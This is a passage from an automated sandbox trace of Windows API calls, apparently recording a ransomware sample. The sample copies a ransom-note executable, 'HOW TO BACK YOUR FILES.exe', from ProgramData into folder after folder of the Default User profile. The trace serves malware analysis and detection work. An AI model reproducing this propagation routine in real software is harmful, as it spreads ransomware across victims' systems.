ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.575] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.575] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.575] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.575] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.575] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.575] GetLastError () returned 0x0 [0042.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.575] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.576] CloseHandle (hObject=0x118) returned 1 [0042.576] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.576] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.576] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.576] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.576] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.577] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.577] GetLastError () returned 0x0 [0042.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.577] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.577] CloseHandle (hObject=0x118) returned 1 [0042.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.577] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.577] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.578] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.578] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.578] GetLastError () returned 0x0 [0042.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.578] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.578] CloseHandle (hObject=0x118) returned 1 [0042.578] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.578] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.579] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.579] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.579] GetLastError () returned 0x0 [0042.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.579] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.580] CloseHandle (hObject=0x118) returned 1 [0042.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.580] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.580] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.581] GetLastError () returned 0x0 [0042.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.581] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.581] CloseHandle (hObject=0x118) returned 1 [0042.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.581] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.581] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.582] GetLastError () returned 0x0 [0042.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.582] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.582] CloseHandle (hObject=0x118) returned 1 [0042.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.582] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.583] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.583] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.583] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.583] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.583] GetLastError () returned 0x0 [0042.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.583] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.583] CloseHandle (hObject=0x118) returned 1 [0042.584] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.584] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.584] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.584] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.584] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.584] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.585] GetLastError () returned 0x0 [0042.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.585] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.585] CloseHandle (hObject=0x118) returned 1 [0042.585] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.585] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.585] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.586] GetLastError () returned 0x0 [0042.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.586] ReadFile (in: hFile=0x118, 